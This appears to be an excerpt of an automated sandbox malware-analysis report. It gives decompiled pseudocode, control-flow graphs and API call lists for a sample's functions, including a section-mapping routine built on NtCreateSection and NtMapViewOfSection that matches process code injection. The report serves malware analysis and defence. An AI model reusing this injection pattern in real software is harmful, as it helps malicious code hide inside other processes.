                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                      • Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
                                                                                      • Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
                                                                                      • Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 255 40159a-4015b2 call 4011f5 259 4015b4 255->259 260 4015b7-4015bc 255->260 259->260 262 4015c2-4015d3 260->262 263 4018d7-4018df 260->263 266 4018d5 262->266 267 4015d9-401602 262->267 263->260 268 4018e4-40192f call 4011f5 263->268 266->268 267->266 276 401608-40161f NtDuplicateObject 267->276 276->266 278 401625-401649 NtCreateSection 276->278 280 4016a5-4016cb NtCreateSection 278->280 281 40164b-40166c NtMapViewOfSection 278->281 280->266 282 4016d1-4016d5 280->282 281->280 284 40166e-40168a NtMapViewOfSection 281->284 282->266 285 4016db-4016fc NtMapViewOfSection 282->285 284->280 287 40168c-4016a2 284->287 285->266 288 401702-40171e NtMapViewOfSection 285->288 287->280 288->266 291 401724 288->291 291->266 293 401724 call 401729 291->293 293->266
                                                                                      C-Code - Quality: 84%
                                                                                      			E0040159A() {
                                                                                      				intOrPtr _t86;
                                                                                      				struct _EXCEPTION_RECORD _t89;
                                                                                      				intOrPtr _t90;
                                                                                      				struct _GUID _t96;
                                                                                      				struct _GUID _t98;
                                                                                      				long _t99;
                                                                                      				PVOID* _t120;
                                                                                      				PVOID* _t122;
                                                                                      				intOrPtr _t127;
                                                                                      				struct _EXCEPTION_RECORD* _t132;
                                                                                      				void* _t175;
                                                                                      				struct _EXCEPTION_RECORD _t176;
                                                                                      				struct _EXCEPTION_RECORD* _t184;
                                                                                      				intOrPtr* _t186;
                                                                                      				HANDLE* _t187;
                                                                                      				HANDLE* _t188;
                                                                                      				void* _t201;
                                                                                      				void* _t202;
                                                                                      				intOrPtr* _t204;
                                                                                      				void* _t209;
                                                                                      
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t175, _t209);
                                                                                      				_t127 =  *((intOrPtr*)(_t202 + 8));
                                                                                      				_t176 = 0;
                                                                                      				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                      				if(gs != 0) {
                                                                                      					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                      					if(_t86 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
                                                                                      				_t184 = _t202 - 0x60;
                                                                                      				 *_t184 = _t176;
                                                                                      				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
                                                                                      				_t89 =  *_t184;
                                                                                      				if(_t89 != 0) {
                                                                                      					_t132 = _t202 - 0x30;
                                                                                      					 *_t132 = _t89;
                                                                                      					 *(_t132 + 4) = _t176;
                                                                                      					_t186 = _t202 - 0x28;
                                                                                      					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
                                                                                      					 *_t186 = 0x18;
                                                                                      					_push(_t202 - 0x30);
                                                                                      					_push(_t186);
                                                                                      					_push(0x40);
                                                                                      					_push(_t202 - 0x10);
                                                                                      					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
                                                                                      						 *(_t202 - 8) = _t176;
                                                                                      						_t96 = _t202 - 0x50;
                                                                                      						 *(_t96 + 4) = _t176;
                                                                                      						 *_t96 = 0x5000;
                                                                                      						_t187 = _t202 - 0x54;
                                                                                      						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
                                                                                      							 *_t25 =  *(_t202 - 0x50);
                                                                                      							_t120 = _t202 - 0x44;
                                                                                      							 *_t120 = _t176;
                                                                                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                      								_t122 = _t202 - 0x3c;
                                                                                      								 *_t122 = _t176;
                                                                                      								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
                                                                                      									_t201 =  *(_t202 - 0x44);
                                                                                      									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
                                                                                      									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                                                                                      									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t98 = _t202 - 0x50;
                                                                                      						 *(_t98 + 4) = _t176;
                                                                                      						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                                                                                      						_t188 = _t202 - 0x58;
                                                                                      						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
                                                                                      						if (_t99 != 0) goto L61;
                                                                                      						 *_t99 =  *_t99 + _t99;
                                                                                      					}
                                                                                      				}
                                                                                      				_push(0x15a4);
                                                                                      				_t90 =  *_t204;
                                                                                      				_push(0x83);
                                                                                      				L004011F5(_t176, _t230);
                                                                                      				return _t90;
                                                                                      			}























                                                                                      0x00401592
                                                                                      0x0040159f
                                                                                      0x004015a4
                                                                                      0x004015a7
                                                                                      0x004015a9
                                                                                      0x004015b2
                                                                                      0x004015b4
                                                                                      0x004015b4
                                                                                      0x004015b7
                                                                                      0x004015b7
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018dc
                                                                                      0x004018dc
                                                                                      0x004015c2
                                                                                      0x004015c5
                                                                                      0x004015c8
                                                                                      0x004015cc
                                                                                      0x004015cf
                                                                                      0x004015d3
                                                                                      0x004015d9
                                                                                      0x004015dc
                                                                                      0x004015de
                                                                                      0x004015e1
                                                                                      0x004015e7
                                                                                      0x004015ea
                                                                                      0x004015f8
                                                                                      0x004015f9
                                                                                      0x004015fa
                                                                                      0x004015fc
                                                                                      0x00401602
                                                                                      0x00401625
                                                                                      0x00401628
                                                                                      0x0040162b
                                                                                      0x0040162e
                                                                                      0x00401634
                                                                                      0x00401649
                                                                                      0x0040164e
                                                                                      0x00401651
                                                                                      0x00401654
                                                                                      0x0040166c
                                                                                      0x0040166e
                                                                                      0x00401671
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401696
                                                                                      0x0040169c
                                                                                      0x004016a2
                                                                                      0x004016a2
                                                                                      0x0040168a
                                                                                      0x0040166c
                                                                                      0x004016a5
                                                                                      0x004016b1
                                                                                      0x004016b4
                                                                                      0x004016b6
                                                                                      0x004016c6
                                                                                      0x004016cb
                                                                                      0x004016cf
                                                                                      0x004016cf
                                                                                      0x00401602
                                                                                      0x004018ea
                                                                                      0x004018ef
                                                                                      0x00401914
                                                                                      0x00401926
                                                                                      0x0040192f

                                                                                      APIs
                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                      • String ID:
                                                                                      • API String ID: 1546783058-0
                                                                                      • Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                      • Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
                                                                                      • Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
                                                                                      • Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 294 92c040-92c059 295 92c05b-92c05d 294->295 296 92c064-92c070 CreateToolhelp32Snapshot 295->296 297 92c05f 295->297 298 92c072-92c078 296->298 299 92c080-92c08d Module32First 296->299 297->296 298->299 304 92c07a-92c07e 298->304 300 92c096-92c09e 299->300 301 92c08f-92c090 call 92bcff 299->301 305 92c095 301->305 304->295 304->299 305->300
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0092C068
                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 0092C088
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_926000_file.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 3833638111-0
                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction ID: 30ed9369d4d9b2bdf01006bbdcfc56868ef1d99884b210018a2fae0d87e31650
                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                      • Instruction Fuzzy Hash: F9F06271640721ABDB202AF9A88DB6E76ECAF49765F100629E646910C4DB70E8454AA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 307 401749-40174c 309 4018d5-40192f call 4011f5 307->309 310 4016db-4016fc NtMapViewOfSection 307->310 310->309 311 401702-40171e NtMapViewOfSection 310->311 311->309 313 401724 311->313 313->309 316 401724 call 401729 313->316 316->309
                                                                                      APIs
                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: SectionView
                                                                                      • String ID:
                                                                                      • API String ID: 1323581903-0
                                                                                      • Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                      • Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
                                                                                      • Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
                                                                                      • Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 326 40d46e-40d47d 328 40d483-40d486 326->328 329 40d47f-40d482 326->329 330 40d496-40d49f call 41016a 328->330 331 40d488-40d48d 328->331 334 40d4a4-40d4a9 330->334 331->331 332 40d48f-40d494 331->332 332->330 332->331 335 40d4b8-40d4c3 334->335 336 40d4ab-40d4b7 334->336 335->336
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __malloc_crt
                                                                                      • String ID:
                                                                                      • API String ID: 3464615804-0
                                                                                      • Opcode ID: 0e0d0852ba675dc253a089d0581900ec84b166aeb2498084035e16220a57a6b7
                                                                                      • Instruction ID: dc12d9ca95c807f25fa40f9f4062b03fcf5f525b61a82a4516a4eebe822b1398
                                                                                      • Opcode Fuzzy Hash: 0e0d0852ba675dc253a089d0581900ec84b166aeb2498084035e16220a57a6b7
                                                                                      • Instruction Fuzzy Hash: B8F0E937D0411059C6107A797C088BB1128DAC6369312453BF852E3280E53C4D8742A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 339 40ad26-40ad48 HeapCreate 340 40ad4a-40ad4b 339->340 341 40ad4c-40ad55 339->341
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040AD3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 10892065-0
                                                                                      • Opcode ID: 8841b35fdb012d59dfd1d56b52044be8e3028d35aec85cea4f688855a86ab408
                                                                                      • Instruction ID: 33601803dec21bc9858d4b4c15db4570389989f6bce26dda3eb6fc3d9d2f7fcd
                                                                                      • Opcode Fuzzy Hash: 8841b35fdb012d59dfd1d56b52044be8e3028d35aec85cea4f688855a86ab408
                                                                                      • Instruction Fuzzy Hash: A2D05E725643499FDB005F767C197623BDC9788796F008436F90CCA1A0E574C550DA04
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 342 4092ad-4092af call 40923b 344 4092b4-4092b5 342->344
                                                                                      APIs
                                                                                      • __encode_pointer.LIBCMT ref: 004092AF
                                                                                        • Part of subcall function 0040923B: RtlEncodePointer.NTDLL(?), ref: 004092A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer__encode_pointer
                                                                                      • String ID:
                                                                                      • API String ID: 4150071819-0
                                                                                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                      • Instruction ID: c0329c36016f13b555f0401d5dada3717c26bc585b466830dd12e66dd0630b09
                                                                                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 345 401932-40197e 353 401981-4019a3 call 4011f5 Sleep call 401467 345->353 354 40196f-40197a 345->354 359 4019b2-4019f7 call 4011f5 353->359 360 4019a5-4019ad call 401558 353->360 354->353 360->359
                                                                                      C-Code - Quality: 22%
                                                                                      			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                      				char _v8;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t10;
                                                                                      				void* _t12;
                                                                                      				intOrPtr* _t14;
                                                                                      				void* _t19;
                                                                                      				void* _t20;
                                                                                      
                                                                                      				_push(0x1986);
                                                                                      				_push(0x6d);
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(_t19, __eflags);
                                                                                      				_t14 = _a4;
                                                                                      				Sleep(0x1388);
                                                                                      				_push( &_v8);
                                                                                      				_push(_a12);
                                                                                      				_push(_a8);
                                                                                      				_push(_t14); // executed
                                                                                      				_t10 = L00401467(_t19, _t20); // executed
                                                                                      				_t26 = _t10;
                                                                                      				if(_t10 != 0) {
                                                                                      					E00401558(_t14, _t10, _v8, _a16); // executed
                                                                                      				}
                                                                                      				 *_t14(0xffffffff, 0);
                                                                                      				_t12 = 0x1986;
                                                                                      				_push(0x6d);
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(_t19, _t26);
                                                                                      				return _t12;
                                                                                      			}











                                                                                      0x00401943
                                                                                      0x0040195b
                                                                                      0x0040196f
                                                                                      0x00401981
                                                                                      0x00401986
                                                                                      0x0040198e
                                                                                      0x00401994
                                                                                      0x00401995
                                                                                      0x00401998
                                                                                      0x0040199b
                                                                                      0x0040199c
                                                                                      0x004019a1
                                                                                      0x004019a3
                                                                                      0x004019ad
                                                                                      0x004019ad
                                                                                      0x004019b6
                                                                                      0x004019c2
                                                                                      0x004019cf
                                                                                      0x004019e1
                                                                                      0x004019ee
                                                                                      0x004019f7

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                      • String ID:
                                                                                      • API String ID: 4152845823-0
                                                                                      • Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                      • Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
                                                                                      • Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
                                                                                      • Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 374 40193d-40197e 377 401981-4019a3 call 4011f5 Sleep call 401467 374->377 378 40196f-40197a 374->378 383 4019b2-4019f7 call 4011f5 377->383 384 4019a5-4019ad call 401558 377->384 378->377 384->383
                                                                                      C-Code - Quality: 29%
                                                                                      			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                      				void* _t14;
                                                                                      				void* _t16;
                                                                                      				intOrPtr* _t18;
                                                                                      				void* _t30;
                                                                                      				signed int _t38;
                                                                                      
                                                                                      				_t26 = __edi;
                                                                                      				asm("in eax, 0x45");
                                                                                      				_t2 = __eax - 0x7a;
                                                                                      				 *_t2 =  *(__eax - 0x7a) | __ecx;
                                                                                      				_t38 =  *_t2;
                                                                                      				_push(0x1986);
                                                                                      				_push(0x6d);
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(__edi, _t38);
                                                                                      				_t18 =  *((intOrPtr*)(_t30 + 8));
                                                                                      				Sleep(0x1388);
                                                                                      				_push(_t30 - 4);
                                                                                      				_push( *((intOrPtr*)(_t30 + 0x10)));
                                                                                      				_push( *((intOrPtr*)(_t30 + 0xc)));
                                                                                      				_push(_t18); // executed
                                                                                      				_t14 = L00401467(__edi, __esi); // executed
                                                                                      				_t39 = _t14;
                                                                                      				if(_t14 != 0) {
                                                                                      					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
                                                                                      				}
                                                                                      				 *_t18(0xffffffff, 0);
                                                                                      				_t16 = 0x1986;
                                                                                      				_push(0x6d);
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(_t26, _t39);
                                                                                      				return _t16;
                                                                                      			}








                                                                                      0x0040193d
                                                                                      0x00401940
                                                                                      0x00401942
                                                                                      0x00401942
                                                                                      0x00401942
                                                                                      0x00401943
                                                                                      0x0040195b
                                                                                      0x0040196f
                                                                                      0x00401981
                                                                                      0x00401986
                                                                                      0x0040198e
                                                                                      0x00401994
                                                                                      0x00401995
                                                                                      0x00401998
                                                                                      0x0040199b
                                                                                      0x0040199c
                                                                                      0x004019a1
                                                                                      0x004019a3
                                                                                      0x004019ad
                                                                                      0x004019ad
                                                                                      0x004019b6
                                                                                      0x004019c2
                                                                                      0x004019cf
                                                                                      0x004019e1
                                                                                      0x004019ee
                                                                                      0x004019f7

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                      • String ID:
                                                                                      • API String ID: 4152845823-0
                                                                                      • Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                      • Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
                                                                                      • Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                      • Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 398 40196c-4019a3 call 4011f5 Sleep call 401467 404 4019b2-4019f7 call 4011f5 398->404 405 4019a5-4019ad call 401558 398->405 405->404
                                                                                      C-Code - Quality: 25%
                                                                                      			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				void* _t9;
                                                                                      				void* _t11;
                                                                                      				intOrPtr* _t13;
                                                                                      				void* _t23;
                                                                                      
                                                                                      				_t19 = __edi;
                                                                                      				_pop(es);
                                                                                      				asm("sbb bh, [eax+ebp*2]");
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(__edi, __eflags);
                                                                                      				_t13 =  *((intOrPtr*)(_t23 + 8));
                                                                                      				Sleep(0x1388);
                                                                                      				_push(_t23 - 4);
                                                                                      				_push( *((intOrPtr*)(_t23 + 0x10)));
                                                                                      				_push( *((intOrPtr*)(_t23 + 0xc)));
                                                                                      				_push(_t13); // executed
                                                                                      				_t9 = L00401467(__edi, __esi); // executed
                                                                                      				_t29 = _t9;
                                                                                      				if(_t9 != 0) {
                                                                                      					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
                                                                                      				}
                                                                                      				 *_t13(0xffffffff, 0);
                                                                                      				_t11 = 0x1986;
                                                                                      				_push(0x6d);
                                                                                      				_push(0xc5);
                                                                                      				L004011F5(_t19, _t29);
                                                                                      				return _t11;
                                                                                      			}







                                                                                      0x0040196c
                                                                                      0x0040196c
                                                                                      0x0040196d
                                                                                      0x0040196f
                                                                                      0x00401981
                                                                                      0x00401986
                                                                                      0x0040198e
                                                                                      0x00401994
                                                                                      0x00401995
                                                                                      0x00401998
                                                                                      0x0040199b
                                                                                      0x0040199c
                                                                                      0x004019a1
                                                                                      0x004019a3
                                                                                      0x004019ad
                                                                                      0x004019ad
                                                                                      0x004019b6
                                                                                      0x004019c2
                                                                                      0x004019cf
                                                                                      0x004019e1
                                                                                      0x004019ee
                                                                                      0x004019f7

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                        • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                        • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313074866.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                      • String ID:
                                                                                      • API String ID: 4152845823-0
                                                                                      • Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                      • Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
                                                                                      • Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                      • Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0092BD50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, Offset: 00926000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_926000_file.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction ID: 3dede0b21495f295fa5c7d7dbe8f24ba3b10f81da5f3c62af5781f2f6dcd9efe
                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                      • Instruction Fuzzy Hash: 91113C79A00208EFDB01DF98C985E98BBF5AF08351F058094F9489B362D371EA50EF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N@
                                                                                      • API String ID: 0-1509896676
                                                                                      • Opcode ID: 5799d9a6d6225937f7641a95d93f9d19f28f762cd8c6faef43d60b8bc9be8953
                                                                                      • Instruction ID: 7db87f17a8ee09ba6974bd9f662c69276171eae5dcd0735ac5f2f1c5ee244eb2
                                                                                      • Opcode Fuzzy Hash: 5799d9a6d6225937f7641a95d93f9d19f28f762cd8c6faef43d60b8bc9be8953
                                                                                      • Instruction Fuzzy Hash: D2616D71901626CFCB18CF49C5845EAF7A2FF89304B1AC16AD90A6B366D7749D81CBC4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.313093446.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
